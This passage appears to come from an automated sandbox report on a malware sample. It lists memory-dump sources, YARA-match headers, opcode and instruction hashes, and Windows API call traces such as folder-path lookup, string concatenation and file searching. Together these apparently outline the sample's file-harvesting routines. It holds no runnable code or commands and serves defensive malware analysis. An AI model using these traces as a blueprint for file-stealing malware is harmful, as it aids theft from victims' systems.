                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                    • String ID: aA
                                    • API String ID: 2699682494-2567749500
                                    • Opcode ID: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                    • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                    • Opcode Fuzzy Hash: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                    • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                    • lstrlen.KERNEL32(00000000), ref: 007EBF06
                                      • Part of subcall function 007F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F90B9
                                    • StrStrA.SHLWAPI(00000000,004213E0), ref: 007EBF34
                                    • lstrlen.KERNEL32(00000000), ref: 007EC00C
                                    • lstrlen.KERNEL32(00000000), ref: 007EC020
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                    • String ID:
                                    • API String ID: 1440504306-0
                                    • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                    • Instruction ID: 8ba16799a1714b03ad6022c358115d60d73370ea3c1b29b4afb68a4cb7ff5084
                                    • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                    • Instruction Fuzzy Hash: D9B1F0B5910218EBCB14EBA0DD5ADFE7739AF54300F404169F60A62291EF386A48CB62
                                    APIs
                                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileNextlstrcat
                                    • String ID: !=A
                                    • API String ID: 3840410801-2919091325
                                    • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                    • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                    • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                    • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                    APIs
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F51E1
                                    • lstrcat.KERNEL32(?,00421070), ref: 007F51FE
                                    • lstrcat.KERNEL32(?,0064A5F8), ref: 007F5212
                                    • lstrcat.KERNEL32(?,00421074), ref: 007F5224
                                      • Part of subcall function 007F4B77: wsprintfA.USER32 ref: 007F4B93
                                      • Part of subcall function 007F4B77: FindFirstFileA.KERNEL32(?,?), ref: 007F4BAA
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 007F4BD8
                                      • Part of subcall function 007F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 007F4BEE
                                      • Part of subcall function 007F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DE4
                                      • Part of subcall function 007F4B77: FindClose.KERNEL32(000000FF), ref: 007F4DF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                    • Instruction ID: 64aa4697e10afb24fcfd1fa5d86197a571fcd4a2a6ed2edb255b42ba38d78ccd
                                    • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                    • Instruction Fuzzy Hash: 6021ADBAA40208FBC754FBF0DC4AEE9337DAB59700F404589774992181DE7896C9CB92
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID:
                                    • API String ID: 1206339513-0
                                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                    • Instruction ID: 2867e8f312e7a1624d4bf531e616526c012166b6d2161a93fdc79b2d827c3187
                                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                    • Instruction Fuzzy Hash: 23011A79540108FFCB04DFECD988EAE7BBAEF49394F108148FA098B300C635AA40DB95